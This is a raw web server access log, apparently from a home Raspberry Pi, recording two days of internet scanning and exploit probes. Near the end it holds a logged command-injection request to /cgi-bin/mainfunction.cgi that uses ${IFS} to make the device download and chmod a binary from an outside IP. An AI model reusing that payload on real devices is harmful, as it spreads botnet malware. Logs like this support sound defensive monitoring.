Wed Apr 1 06:25:06 MDT 2020 06:25:06 up 36 days, 10:53, 1 user, load average: 0.43, 0.29, 0.47 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 24Feb20 36days 29:18 1.96s /usr/bin/lxsession -s LXDE-pi -e LXDE 51.68.120.183 - - [01/Apr/2020:12:25:39 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 93.140.56.20 - - [01/Apr/2020:13:47:07 +0000] "GET / HTTP/1.1" 400 0 "" "" 103.90.206.32 - - [01/Apr/2020:13:53:56 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 173.212.218.126 - - [01/Apr/2020:14:13:39 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 185.173.35.53 - - [01/Apr/2020:14:15:35 +0000] "GET / HTTP/1.0" 200 25000 "" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" 103.124.147.34 - - [01/Apr/2020:14:44:45 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 35.233.105.134 - - [01/Apr/2020:15:46:12 +0000] "GET / HTTP/1.1" 200 25000 "" "python-requests/2.18.4" 128.14.133.58 - - [01/Apr/2020:16:14:33 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 " 171.67.70.85 - - [01/Apr/2020:16:43:04 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 208.91.109.18 - - [01/Apr/2020:16:49:02 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 208.91.109.18 - - [01/Apr/2020:16:49:02 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" "" 162.243.128.224 - - [01/Apr/2020:16:59:05 +0000] "GET /portal/redlion HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 209.236.92.21 - - [01/Apr/2020:17:12:33 +0000] "GET / HTTP/1.1" 400 0 "" "" 85.100.157.30 - - [01/Apr/2020:18:08:18 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 66.240.205.34 - - [01/Apr/2020:19:19:19 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 99.13.124.52 - - [01/Apr/2020:19:27:19 +0000] "GET / HTTP/1.1" 400 0 "" "" 50.197.243.62 - - [01/Apr/2020:19:53:43 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 50.197.243.62 - - [01/Apr/2020:19:53:47 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC BOTNET" 140.143.249.140 - - [01/Apr/2020:20:35:02 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 140.143.249.140 - - [01/Apr/2020:20:35:04 +0000] "GET /TP/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 140.143.249.140 - - [01/Apr/2020:20:35:04 +0000] "GET /TP/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 140.143.249.140 - - [01/Apr/2020:20:35:05 +0000] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 140.143.249.140 - - [01/Apr/2020:20:35:06 +0000] "GET /html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 140.143.249.140 - - [01/Apr/2020:20:35:06 +0000] "GET /public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 140.143.249.140 - - [01/Apr/2020:20:35:07 +0000] "GET /TP/html/public/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 140.143.249.140 - - [01/Apr/2020:20:35:07 +0000] "GET /elrekt.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 140.143.249.140 - - [01/Apr/2020:20:35:08 +0000] "GET /index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 140.143.249.140 - - [01/Apr/2020:20:35:08 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" 115.70.31.109 - - [01/Apr/2020:20:41:11 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 138.97.146.193 - - [01/Apr/2020:20:57:44 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 47.111.19.40 - - [01/Apr/2020:21:28:48 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 208.91.109.18 - - [01/Apr/2020:22:26:29 +0000] "UNKNOWN UNKNOWN" 0 0 "" "" 208.91.109.18 - - [01/Apr/2020:22:26:30 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" "" 171.67.70.85 - - [01/Apr/2020:22:57:41 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 46.101.171.183 - - [01/Apr/2020:23:30:26 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 46.101.171.183 - - [01/Apr/2020:23:30:29 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 190.94.135.119 - - [02/Apr/2020:00:44:06 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 45.165.144.187 - - [02/Apr/2020:03:09:27 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 201.150.109.10 - - [02/Apr/2020:04:44:46 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 171.67.70.85 - - [02/Apr/2020:05:32:03 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x" 159.65.11.106 - - [02/Apr/2020:05:32:36 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" 115.134.133.38 - - [02/Apr/2020:05:58:39 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 169.197.108.6 - - [02/Apr/2020:06:06:23 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 " 172.245.124.138 - - [02/Apr/2020:06:18:02 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 172.245.124.138 - - [02/Apr/2020:06:18:02 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 192.241.237.93 - - [02/Apr/2020:09:24:53 +0000] "GET /hudson HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x" 94.231.199.240 - - [02/Apr/2020:10:16:56 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" 164.132.92.162 - - [02/Apr/2020:11:57:44 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7 HTTP/1.1" 400 0 "" "" 164.132.92.162 - - [02/Apr/2020:11:57:44 +0000] "UNKNOWN UNKNOWN" 400 0 "" "" 144.91.117.138 - - [02/Apr/2020:12:09:52 +0000] "GET / HTTP/1.1" 200 25000 "" "libwww-perl/5.833" Thu Apr 2 06:25:06 MDT 2020 06:25:06 up 37 days, 10:53, 1 user, load average: 0.46, 0.28, 0.27 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT pi tty7 :0 24Feb20 37days 29:53 1.96s /usr/bin/lxsession -s LXDE-pi -e LXDE